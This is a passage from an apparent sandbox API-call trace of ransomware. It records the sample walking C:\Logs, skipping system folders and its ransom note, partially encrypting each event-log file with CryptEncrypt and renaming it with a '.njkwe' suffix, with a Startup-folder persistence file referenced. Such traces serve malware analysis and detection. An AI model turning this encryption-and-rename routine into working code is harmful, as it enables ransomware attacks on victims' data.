pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx_r00t_{3sXlE5}.njkwe") returned 74 [0066.813] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.814] GetProcessHeap () returned 0xbe0000 [0066.814] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.814] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb1ea1c9, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb1ea1c9, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-SMBServer%4Audit.evtx", cAlternateFileName="MIE3AD~1.EVT")) returned 1 [0066.814] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Audit.evtx", lpString2="Windows") returned -1 [0066.814] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Audit.evtx", lpString2="$Recycle.bin") returned 1 [0066.814] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Audit.evtx", lpString2="System Volume Information") returned -1 [0066.815] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Audit.evtx", lpString2="Program Files") returned -1 [0066.815] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Audit.evtx", lpString2="Program Files (x86)") returned -1 [0066.815] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 51 [0066.815] StrStrIW (lpFirst="Microsoft-Windows-SMBServer%4Audit.evtx", lpSrch=".njkwe") returned 0x0 [0066.815] lstrcmpW (lpString1="Microsoft-Windows-SMBServer%4Audit.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.815] lstrcmpW (lpString1="Microsoft-Windows-SMBServer%4Audit.evtx", lpString2="taridd") returned -1 [0066.815] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.815] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.815] GetTickCount () returned 0x1151190 [0066.815] GetTickCount () returned 0x1151190 [0066.815] GetTickCount () returned 0x1151190 [0066.815] GetTickCount () returned 0x1151190 [0066.815] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.815] GetProcessHeap () returned 0xbe0000 [0066.815] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.815] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.817] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.817] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.817] GetProcessHeap () returned 0xbe0000 [0066.817] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.817] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.817] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.818] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.818] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.818] CloseHandle (hObject=0x428) returned 1 [0066.820] GetProcessHeap () returned 0xbe0000 [0066.820] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.820] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx_r00t_{3sXlE5}.njkwe") returned 71 [0066.820] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.821] GetProcessHeap () returned 0xbe0000 [0066.821] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.821] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb19dd19, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb19dd19, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-SMBServer%4Connectivity.evtx", cAlternateFileName="MI8248~1.EVT")) returned 1 [0066.822] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Connectivity.evtx", lpString2="Windows") returned -1 [0066.822] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Connectivity.evtx", lpString2="$Recycle.bin") returned 1 [0066.822] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Connectivity.evtx", lpString2="System Volume Information") returned -1 [0066.822] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Connectivity.evtx", lpString2="Program Files") returned -1 [0066.822] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Connectivity.evtx", lpString2="Program Files (x86)") returned -1 [0066.822] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 58 [0066.822] StrStrIW (lpFirst="Microsoft-Windows-SMBServer%4Connectivity.evtx", lpSrch=".njkwe") returned 0x0 [0066.822] lstrcmpW (lpString1="Microsoft-Windows-SMBServer%4Connectivity.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.822] lstrcmpW (lpString1="Microsoft-Windows-SMBServer%4Connectivity.evtx", lpString2="taridd") returned -1 [0066.822] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.822] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.822] GetTickCount () returned 0x11511a0 [0066.822] GetTickCount () returned 0x11511a0 [0066.822] GetTickCount () returned 0x11511a0 [0066.822] GetTickCount () returned 0x11511a0 [0066.822] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.822] GetProcessHeap () returned 0xbe0000 [0066.822] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.822] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.824] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.824] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.824] GetProcessHeap () returned 0xbe0000 [0066.824] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.824] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.824] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.825] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.825] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.825] CloseHandle (hObject=0x428) returned 1 [0066.827] GetProcessHeap () returned 0xbe0000 [0066.827] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.827] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx_r00t_{3sXlE5}.njkwe") returned 78 [0066.827] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.827] GetProcessHeap () returned 0xbe0000 [0066.827] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.827] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb151873, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb151873, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-SMBServer%4Operational.evtx", cAlternateFileName="MI4B6B~1.EVT")) returned 1 [0066.827] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Operational.evtx", lpString2="Windows") returned -1 [0066.828] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0066.828] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Operational.evtx", lpString2="System Volume Information") returned -1 [0066.828] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Operational.evtx", lpString2="Program Files") returned -1 [0066.828] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0066.828] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 57 [0066.828] StrStrIW (lpFirst="Microsoft-Windows-SMBServer%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0066.828] lstrcmpW (lpString1="Microsoft-Windows-SMBServer%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.828] lstrcmpW (lpString1="Microsoft-Windows-SMBServer%4Operational.evtx", lpString2="taridd") returned -1 [0066.828] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.828] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.828] GetTickCount () returned 0x11511a0 [0066.828] GetTickCount () returned 0x11511a0 [0066.828] GetTickCount () returned 0x11511a0 [0066.828] GetTickCount () returned 0x11511a0 [0066.828] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.828] GetProcessHeap () returned 0xbe0000 [0066.828] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.828] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.830] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.830] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.830] GetProcessHeap () returned 0xbe0000 [0066.830] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.830] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.830] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.831] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.831] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.831] CloseHandle (hObject=0x428) returned 1 [0066.833] GetProcessHeap () returned 0xbe0000 [0066.833] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.833] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 77 [0066.833] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.833] GetProcessHeap () returned 0xbe0000 [0066.833] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.833] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb177aca, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb177aca, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-SMBServer%4Security.evtx", cAlternateFileName="MI7709~1.EVT")) returned 1 [0066.833] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Security.evtx", lpString2="Windows") returned -1 [0066.833] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Security.evtx", lpString2="$Recycle.bin") returned 1 [0066.833] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Security.evtx", lpString2="System Volume Information") returned -1 [0066.833] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Security.evtx", lpString2="Program Files") returned -1 [0066.833] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Security.evtx", lpString2="Program Files (x86)") returned -1 [0066.833] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 54 [0066.833] StrStrIW (lpFirst="Microsoft-Windows-SMBServer%4Security.evtx", lpSrch=".njkwe") returned 0x0 [0066.833] lstrcmpW (lpString1="Microsoft-Windows-SMBServer%4Security.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.833] lstrcmpW (lpString1="Microsoft-Windows-SMBServer%4Security.evtx", lpString2="taridd") returned -1 [0066.833] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.834] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.834] GetTickCount () returned 0x11511a0 [0066.834] GetTickCount () returned 0x11511a0 [0066.834] GetTickCount () returned 0x11511a0 [0066.834] GetTickCount () returned 0x11511a0 [0066.834] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.834] GetProcessHeap () returned 0xbe0000 [0066.834] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.834] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.836] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.836] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.836] GetProcessHeap () returned 0xbe0000 [0066.836] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.836] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.836] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.836] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.837] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.837] CloseHandle (hObject=0x428) returned 1 [0066.838] GetProcessHeap () returned 0xbe0000 [0066.838] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.839] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx_r00t_{3sXlE5}.njkwe") returned 74 [0066.839] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.839] GetProcessHeap () returned 0xbe0000 [0066.839] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.839] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd751ea61, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd751ea61, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-Store%4Operational.evtx", cAlternateFileName="MICEDD~1.EVT")) returned 1 [0066.839] lstrcmpiW (lpString1="Microsoft-Windows-Store%4Operational.evtx", lpString2="Windows") returned -1 [0066.839] lstrcmpiW (lpString1="Microsoft-Windows-Store%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0066.839] lstrcmpiW (lpString1="Microsoft-Windows-Store%4Operational.evtx", lpString2="System Volume Information") returned -1 [0066.839] lstrcmpiW (lpString1="Microsoft-Windows-Store%4Operational.evtx", lpString2="Program Files") returned -1 [0066.839] lstrcmpiW (lpString1="Microsoft-Windows-Store%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0066.839] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 53 [0066.839] StrStrIW (lpFirst="Microsoft-Windows-Store%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0066.840] lstrcmpW (lpString1="Microsoft-Windows-Store%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.840] lstrcmpW (lpString1="Microsoft-Windows-Store%4Operational.evtx", lpString2="taridd") returned -1 [0066.840] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.840] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.840] GetTickCount () returned 0x11511b0 [0066.840] GetTickCount () returned 0x11511b0 [0066.840] GetTickCount () returned 0x11511b0 [0066.840] GetTickCount () returned 0x11511b0 [0066.841] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.841] GetProcessHeap () returned 0xbe0000 [0066.841] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.841] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.842] SetFilePointerEx (in: hFile=0x428, 